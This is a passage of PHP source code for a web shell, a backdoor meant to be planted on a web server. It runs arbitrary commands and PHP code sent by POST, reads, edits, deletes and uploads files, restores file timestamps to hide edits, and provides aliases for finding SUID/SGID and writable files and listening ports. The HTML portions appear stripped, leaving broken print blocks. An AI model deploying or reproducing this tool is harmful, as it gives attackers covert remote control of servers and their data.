$v) $_POST[$k] = stripslashes($v); foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); } function execute($c){ if(function_exists('exec')){ @exec($c, $out); return @implode("\n", $out); }elseif(function_exists('shell_exec')){ $out = @shell_exec($c); return $out; }elseif(function_exists('system')){ @ob_start(); @system($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }elseif(function_exists('passthru')){ @ob_start(); @passthru($c, $ret); $out = @ob_get_contents(); @ob_end_clean(); return $out; }else{ return FALSE; } } function read($f){ $str = @file($f); if($str){ $out = implode('', $str); }elseif(function_exists('curl_version')){ @ob_start(); $h = @curl_init('file:/'.'/'.$f); @curl_exec($h); $out = @ob_get_contents(); @ob_end_clean(); }else{ $out = 'Could not read file!'; } return htmlspecialchars($out); } function write($f, $c){ $t = filemtime($f); $fp = @fopen($f, 'w'); if($fp){ fwrite($fp, $c); fclose($fp); $out = 'File saved.'."\n"; if($t && touch($f, $t)){ $out .= 'Last modification time changed.'; }else{ $out .= 'Could not change last modification time!'; } }else{ $out = 'Saving failed!'; } return $out; } function file_size($f){ $size = filesize($f); if($size < 1024) $size = $size.' b'; elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb'; elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb'; return $size; } if(!function_exists('natcasesort')){ function natcasesort($arr){ return sort($arr); } } if(!empty($_POST['dir'])){ $dir = $_POST['dir']; if(!@chdir($dir)) $out = 'chdir() failled!'; } $dir = getcwd(); (strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix'; if(!$os_name = @php_uname()){ if(function_exists('posix_uname')){ $os_name = posix_uname(); }elseif($os_name != getenv('OS')){ $os_name = ''; } } if(function_exists('posix_getpwuid')){ $data = posix_getpwuid(posix_getuid()); $user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')'; }else{ $user = ''; } $safe_mode = get_cfg_var('safe_mode'); $safe_mode ? $safe = 'on' : $safe = 'off'; execute('echo ssps') ? $execute = 'on' : $execute = 'off'; $server = getenv('SERVER_SOFTWARE'); if(!$server) $server = '---'; $out = ''; $tail = ''; $aliases = ''; if(!$safe_mode){ if($os_type == 'nix'){ $os .= execute('sysctl -n kern.ostype'); $os .= execute('sysctl -n kern.osrelease'); $os .= execute('sysctl -n kernel.ostype'); $os .= execute('sysctl -n kernel.osrelease'); if(empty($user)) $user = execute('id'); $aliases = array( '' => '', 'find suid files'=>'find / -type f -perm -04000 -ls', 'find sgid files'=>'find / -type f -perm -02000 -ls', 'find all writable files in current dir'=>'find . -type f -perm -2 -ls', 'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', 'find all writable directories and files in current dir'=>'find . -perm -2 -ls', 'show opened ports'=>'netstat -an | grep -i listen', ); }else{ $os_name .= execute('ver'); $user .= execute('echo %username%'); $aliases = array( '' => '', 'show runing services' => 'net start', 'show process list' => 'tasklist' ); } } if(!empty($_POST['cmd'])){ $out = execute($_POST['cmd']); } elseif(!empty($_POST['php'])){ ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); } elseif(!empty($_POST['edit'])){ $file = $_POST['edit']; $out = read($file); $tail = '
'; } elseif(!empty($_POST['save'])){ $out = write($_POST['efile'], $_POST['save']); } elseif(!empty($_POST['remove'])){ $obj = $_POST['remove']; @is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj); $res ? $out = 'Removed successfully' : $out = 'Removing failed!'; } elseif(!empty($_POST['newdir'])){ @mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!'; } elseif(!empty($_POST['newfile'])){ @touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!'; } elseif(!empty($_POST['alias'])){ $out = execute($_POST['alias']); } elseif(!empty($_FILES['ufile']['tmp_name'])){ if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file'; else $out = 'Uploaded successfully.'; } print<< table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}

here; if(!$safe_mode) print<< here; print<< here; if($aliases){ print<< here; } print<< cmd php actions edit remove new_dir new_file aliases here; foreach($aliases as $k => $v){ print ''.$k.''; } print<< dir upload OS: {$os_name} User: {$user} Server: {$server} safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit} ~:(expl0rer):~ here; if($dp = @openDir($dir)){ $cObj = readDir($dp); while($cObj){ if(@is_dir($cObj)) $theDirs[] = $cObj; elseif(@is_file($cObj)) $theFiles[] = $cObj; $cObj = readDir($dp); } closedir($dp); } if(!empty($theDirs)){ natcasesort($theDirs); if($os_type == 'nix'){ foreach($theDirs as $cDir){ $color='black'; if(is_writeable($cDir)){ $color='red'; }elseif(is_readable($cDir)){ $color='blue'; } print "<".$cDir."> "; } }else{ foreach($theDirs as $cDir){ $tmp = $cDir.'/.ssps_tmp'; if(@touch($tmp)){ $color='red'; unlink($tmp); }elseif(opendir($cDir)){ closedir(); $color='blue'; }else{ $color='black'; } print "<".$cDir."> "; } } } else print ' open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir'); print ' '; if(!empty($theFiles)){ natcasesort($theFiles); print ''; foreach($theFiles as $cFile){ $size = file_size($cFile); if($fp = @fopen($cFile, 'a')) $color = 'red'; elseif($fp = @fopen($cFile, 'r')) $color='blue'; else $color = 'black'; @fclose($fp); print ''; } print ' '.$cFile.' '.$size.' '; } print<< ~:(results):~ {$out} {$tail}

here; die; } ?>